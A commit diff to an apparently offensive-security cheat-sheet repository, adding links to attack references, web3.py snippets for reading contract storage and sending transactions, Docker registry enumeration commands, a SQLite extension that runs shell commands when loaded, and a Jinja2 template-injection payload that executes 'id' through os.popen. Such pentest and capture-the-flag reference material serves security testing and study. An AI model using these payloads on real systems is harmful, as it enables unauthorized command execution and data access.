Up: update lot of things (#19)

* doc: update lot of things

* doc: add link to root readme

README.md

@@ -8,6 +8,7 @@
 ## 📇 Index
 <!-- - [☀️ General](/wiki/General.md) -->
 - [📇 Index](/wiki/Index.md)
+- [💸 Block-chain](/wiki/BlockChain.md)
 - [🔒 Crypto](/wiki/Crypto.md)
 - [☁️ Cloud](/wiki/Cloud.md)
 - [🗄️ Database](/wiki/Database.md)
@@ -31,8 +32,10 @@
 - [Cheat.sh](http://cheat.sh/)
 - [Explain Shell](https://explainshell.com/)
 - [GTFOBins](https://gtfobins.github.io/)
+- [Lolbas](https://lolbas-project.github.io/)
+- [WADComs](https://wadcoms.github.io/)
+- [The Hacker Recipes](https://www.thehacker.recipes/)
 - [HackTricks](https://book.hacktricks.xyz/)
-- [Les Tutos de Processus](https://lestutosdeprocessus.fr/ctf-cheat-sheet/)
 - [OWASP Cheat Sheet](https://cheatsheetseries.owasp.org/index.html)
 
 ## ❤️ Contributors

wiki/BlockChain.md

@@ -0,0 +1,99 @@
+<picture>
+    <source height="100px" srcset="https://github.com/sawyerf/HackSheet/assets/28403617/3debb8d5-b32d-4310-b82f-36208eae701f#gh-dark-mode-only" media="(prefers-color-scheme: dark)">
+    <img height="100px" src="https://github.com/sawyerf/HackSheet/assets/28403617/22329e5d-3b27-41eb-b88c-19671e11c482#gh-light-mode-only">
+</picture>
+
+---
+
+- [Web3.py](#web3py)
+- [Usefull link](#usefull-link)
+
+# Web3.py
+
+Library to interact with Ethereum blockchain:
+- [web3.py](https://pypi.org/project/web3/)
+- [py-solc-x](https://pypi.org/project/py-solc-x/)
+- [solc-select](https://github.com/crytic/solc-select)
+
+### Create new instance of web3.py
+> Note: You need to have a RPC_URL to connect to the blockchain
+
+```py
+from web3 import Web3
+
+w3_instance = Web3(Web3.HTTPProvider("<RPC_URL>")
+assert w3_instance.is_connected()
+```
+
+### Get storage at address (usefull to get private variables):
+> Note: You need to have a web3 instance (see previous snippet)
+
+```py
+storage = w3_instance.eth.get_storage_at("<ADDRESS>", <INT_INDEX>)
+
+# Example:
+storage = w3_instance.eth.get_storage_at("0xfce177A183CDff53910b5399Ee3ADcC982c1b5bE", 0)
+```
+
+### Get block information:
+
+```py
+w3_instance.eth.get_block(<INT_INDEX>, <BOOL_FULL_TRANSACTION>)
+w3_instance.eth.get_block(0, True)
+```
+
+### Get contract instance:
+
+```py
+from solcx import compile_source
+
+contract_code = open("MyContract.sol", "r").read()
+compiled = compile_source(
+   contract_code,
+    output_values=['abi', 'bin']
+)
+
+contract_interface = compiled['<stdin>:MyContract']
+bytecode = contract_interface['bin']
+abi = contract_interface['abi']
+contract = w3_instance.eth.contract(address=contract_address, abi=abi, bytecode=bytecode)
+```
+
+### Get public variables or view/pure functions:
+> Note: You need to have a contract instance (see previous snippet)
+
+```py
+contract.functions.solver().call()
+```
+
+### Call transact function (my_awesome_function):
+> Transact function need to be called with a private key and a caller address
+
+```py
+private_key = "<PRIVATE_KEY>"
+caller = "<CALLER_ADDRESS>"
+
+Chain_id = w3_instance.eth.chain_id
+nonce = w3_instance.eth.get_transaction_count(caller)
+
+tx_data = {"chainId": Chain_id, "from": caller, "nonce": nonce}
+call_function = contract.functions.my_awesome_function().build_transaction(tx_data)
+
+signed_tx = w3_instance.eth.account.sign_transaction(call_function, private_key=private_key)
+send_tx = w3_instance.eth.send_raw_transaction(signed_tx.rawTransaction)
+tx_receipt = w3_instance.eth.wait_for_transaction_receipt(send_tx)
+print(tx_receipt)
+```
+
+### You can also call payable function you just need to add the value, and gas in the tx_data:
+> Note: Gas and gasPrice need to be calculated before.
+
+```py
+tx_data = {'nonce': nonce, 'to': contract_address, 'value': 500000000000000000, 'gas': <INT_GAS>, 'gasPrice': <INT_GAS_PRICE> }
+```
+
+# Usefull link
+
+- [Etherum transaction vizualiser](https://github.com/avan-pra/graph-blockren)
+- [Slither a smart contract analyzer](https://github.com/crytic/slither)
+- [Web3.py doc](https://web3py.readthedocs.io/en/stable/quickstart.html)

wiki/Cloud.md

@@ -8,6 +8,7 @@
 - [AWS](#aws)
 - [Kubernetes](#kubernetes)
 - [Azure](#azure)
+- [Docker registry](#docker-registry)
 
 # AWS
 
@@ -261,3 +262,76 @@ table_service = TableService(account_name="...", sas_token='se=<SE>&sp=<SP>&sv=<
 print(table_service.exists('<TABLE>'))
 print(list(table_service.query_entities('<TABLE>')))
 ```
+
+
+# Docker registry
+### Recon
+
+> By default, docker registry run on port 5000.
+> The first step to do is to know if the registry need authentication token or not. You can do this by sending a request to the registry.
+
+```bash
+curl -I http://<HOST>:5000/v2/
+```
+
+### Get authentication token
+
+> With the header `www-authenticate` you can know if the registry need authentication token or not.
+
+Example of response:
+```
+Www-Authenticate: Bearer realm="http://<HOST>:5001/",service="Docker registry",error="invalid_token"
+```
+
+From this response you can try to get a token, the realm is the url to get the token.
+
+Examples of requests:
+
+```bash
+# Try to get only access on catalog
+curl http://<REALM_URL>/auth?scope=registry:catalog:*&service=<NAME_OF_SERVICE>
+```
+
+```bash
+# Try to get only pull,push right on an image
+curl http://<REALM_URL>/auth?scope=repository:<IMAGE_NAME>:*&service=<NAME_OF_SERVICE>
+```
+
+```bash
+# Try to get only pull right on an image
+curl http://<REALM_URL>/auth?scope=repository:<IMAGE_NAME>:pull&service=<NAME_OF_SERVICE>
+```
+
+### Get all images names
+
+> You can get all images names by sending a request to the registry with the authentication token.
+
+```bash
+curl -H "Authorization: Bearer eyJ......" http://<HOST>:5000/v2/_catalog
+```
+
+### Get all tags for an image
+
+> You can get all tags for an image by sending a request to the registry with the authentication token.
+
+```bash
+curl -H "Authorization: Bearer eyJ......" http://<HOST>:5000/v2/<IMAGE>/tags/list
+```
+
+### Get image manifest
+
+> You can get image manifest by sending a request to the registry with the authentication token.
+
+```bash
+curl -H "Authorization: Bearer eyJ......" http://<HOST>:5000/v2/<IMAGE>/manifests/<TAG>
+```
+
+### Get image layer
+
+```bash
+curl  -H "Authorization: Bearer eyJ......" http://<HOST>:5000/v2/<IMAGE>/blobs/<LAYER>
+```
+
+### Automated tools
+
+You can also use an automated tool like [DockerRegistryGrabber](https://github.com/Syzik/DockerRegistryGrabber).

wiki/Database.md

@@ -60,6 +60,24 @@ or open in vs code
 .tables
 ```
 
+### Load extension
+> Sometimes you have to load extension to get some privileges
+> Note: the function name need to be `sqlite3_<extension_name>_init`
+
+```c
+// gcc -s -g -fPIC -shared my_extension.c -o my_extension.so
+#include <stdlib.h>
+int sqlite3_my_extension_init(){
+    system("id");
+    return 0;
+}
+```
+
+After that you can load the extension on sqlite with:
+```sql
+load_extension("my_extension.so");
+```
+
 # Postgres
 > Port: 5432
 

wiki/Web.md

@@ -287,6 +287,7 @@ ${{1+1}}
 ### Python (Jinja2)
 ```
 {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
+{{request.__class__._load_form_data.__globals__.__builtins__.__import__("os").popen("id").read()}}
 ```
 
 ### Golang